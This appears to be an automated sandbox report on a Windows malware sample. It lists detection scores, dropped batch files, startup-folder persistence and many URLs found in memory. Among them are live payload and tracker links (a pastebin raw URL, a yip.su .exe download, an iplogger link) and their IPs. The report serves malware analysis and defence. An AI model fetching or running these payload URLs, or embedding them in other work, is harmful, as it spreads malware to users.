104.20.4.235, 443, 49715, 49717 CLOUDFLARENETUS United States 17->38 40 iplogger.com 104.21.76.57, 443, 49721 CLOUDFLARENETUS United States 17->40 42 2 other IPs or domains 17->42 32 C:\Users\...\cQXYrsQOJ3uDVcsTMDpcKVmy.bat, ASCII 17->32 dropped 34 C:\Users\...\Rp6RLsI5LmL2C04PREj94eun.bat, ASCII 17->34 dropped 60 Drops script or batch files to the startup folder 21->60 62 Creates HTML files with .exe extension (expired dropper behavior) 21->62 file9 signatures10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe18%ReversingLabs
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://upx.sf.net0%URL Reputationsafe
                    https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/numbering0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/oleObject0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/extendedProperties0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/mailMergeSource0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/aFChunk0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/fontTable0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/hyperlink0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/notesSlide0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/revisionLog0%Avira URL Cloudsafe
                    https://iplogger.org/0%Avira URL Cloudsafe
                    https://yip.su/redirect-0%Avira URL Cloudsafe
                    https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/externalLink0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/xmlMaps0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/diagramQuickStyle0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/slideLayout0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/presProps0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/footnotes0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/endnotes0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/attachedTemplate0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/commentAuthors0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/comments0%Avira URL Cloudsafe
                    https://counter.yadro.ru/hit?0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/chartsheet0%Avira URL Cloudsafe
                    https://yip.su0%Avira URL Cloudsafe
                    https://iplogger.com/1djqU40%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/printerSettings0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/customXmlProps0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/usernames0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/diagramData0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/diagramColors0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/pivotCacheRecords0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/mailMergeRecipientData0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/revisionHeaders0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/package0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/subDocument0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/customProperty0%Avira URL Cloudsafe
                    https://iplogger.com0%Avira URL Cloudsafe
                    https://iplogger.org/privacy/0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/handoutMaster0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/viewProps0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/connections0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/pivotTable0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/sheetMetadata0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/drawing0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/tableStyles0%Avira URL Cloudsafe
                    https://api.datamarket.azure.com/data.ashx/0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/pivotCacheDefinition0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/customXml0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/slideUpdateUrl0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/sharedStrings0%Avira URL Cloudsafe
                    http://yip.su0%Avira URL Cloudsafe
                    https://cdn.iplogger.org/favicon.ico0%Avira URL Cloudsafe
                    https://yip.su/RNWPd0%Avira URL Cloudsafe
                    https://datamarket.azure.com/embedded/query?client_id=0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/chartUserShapes0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/control0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/officeDocument0%Avira URL Cloudsafe
                    https://pastebin.com/raw/V6VJsrV3100%Avira URL Cloudmalware
                    http://purl.oclc.org/ooxml/officeDocument/relationships/queryTable0%Avira URL Cloudsafe
                    https://yip.su/RNWPd.exe100%Avira URL Cloudmalware
                    https://datamarket.azure.com/embedded/result0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/dialogsheet0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/customProperties0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/worksheet0%Avira URL Cloudsafe
                    https://datamarket.azure.com/embedded/consent?client_id=0%Avira URL Cloudsafe
                    https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU40%Avira URL Cloudsafe
                    https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/notesMaster0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/slideMaster0%Avira URL Cloudsafe
                    http://crl.m0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/settings0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/themeOverride0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/htmlPubSaveAs0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/webSettings0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/diagramLayout0%Avira URL Cloudsafe
                    https://iplogger.org/rules/0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/volatileDependencies0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/metadata/thumbnail0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/calcChain0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/transform0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/externalLinkPath0%Avira URL Cloudsafe
                    https://datamarket.accesscontrol.windows.net/v2/OAuth2-13Chttps://api.datamarket.azure.com/#PowerPiv0%Avira URL Cloudsafe
                    http://crl.mho0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/glossaryDocument0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/mailMergeHeaderSource0%Avira URL Cloudsafe
                    http://pastebin.com0%Avira URL Cloudsafe
                    https://pastebin.com0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/tableSingleCells0%Avira URL Cloudsafe
                    http://purl.oclc.org/ooxml/officeDocument/relationships/slideUpdateInfo0%Avira URL Cloudsafe
                    https://datamarket.azure.com/embedded/catalog?client_id=0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    yip.su
                    		188.114.96.3
                    		truefalse
                      		unknown
                      pastebin.com
                      		104.20.4.235
                      		truetrue
                        		unknown
                        iplogger.com
                        		104.21.76.57
                        		truefalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://iplogger.com/1djqU4false
                          • Avira URL Cloud: safe
                          		unknown
                          https://pastebin.com/raw/V6VJsrV3false
                          • Avira URL Cloud: malware
                          		unknown
                          https://yip.su/RNWPd.exefalse
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.cloudflare.com/learning/access-management/phishing-attack/InstallUtil.exe, 00000008.00000002.4058787437.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/oleObjectfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/aFChunkfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/notesSlidefile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/fontTablefile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/revisionLogfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/hyperlinkfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/extendedPropertiesfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/mailMergeSourcefile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/numberingfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://iplogger.org/InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/xmlMapsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/diagramQuickStylefile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-repInstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/slideLayoutfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://yip.su/redirect-InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/presPropsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/externalLinkfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/footnotesfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/endnotesfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/attachedTemplatefile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/commentAuthorsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/commentsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/chartsheetfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://counter.yadro.ru/hit?InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://yip.suInstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/printerSettingsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/customXmlPropsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/diagramDatafile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/usernamesfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/mailMergeRecipientDatafile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/diagramColorsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/packagefile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000008.00000002.4058787437.00000000029F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/pivotCacheRecordsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/revisionHeadersfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/subDocumentfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/customPropertyfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://iplogger.comInstallUtil.exe, 00000008.00000002.4058787437.0000000002A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://iplogger.org/privacy/InstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/drawingfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/handoutMasterfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/pivotTablefile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/viewPropsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/sheetMetadatafile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.datamarket.azure.com/data.ashx/file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/connectionsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/tableStylesfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/pivotCacheDefinitionfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/slideUpdateUrlfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/customXmlfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://yip.suInstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://yip.su/RNWPdInstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/sharedStringsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.iplogger.org/favicon.icoInstallUtil.exe, 00000008.00000002.4058787437.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B5B000.00000004.00000800.00020000.00000000.sdmp, pMkw4TisYGbRi255aTHnqU3d.exe.8.dr, NJKs7fKGojOSP1M6T2T4RfuD.exe.8.dr, JZcYBNj1ubLNiJw9f2J4pNN0.exe.8.dr, ervnd6hdsvGTxZRjT5cWwm7U.exe.8.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://upx.sf.netAmcache.hve.8.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://datamarket.azure.com/embedded/query?client_id=file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/chartUserShapesfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/controlfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/officeDocumentfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/queryTablefile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/customPropertiesfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://datamarket.azure.com/embedded/resultfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/dialogsheetfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/worksheetfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://datamarket.azure.com/embedded/consent?client_id=file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4file.exe, 00000001.00000002.3525479820.000000000CE71000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.3525479820.000000000D195000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3186170342.0000000000522000.00000040.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.cloudflare.com/5xx-error-landingInstallUtil.exe, 00000008.00000002.4058787437.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.4058787437.0000000002B11000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/notesMasterfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/slideMasterfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.mInstallUtil.exe, 00000008.00000002.4056738976.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://purl.oclc.org/ooxml/officeDocument/relationships/settingsfile.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
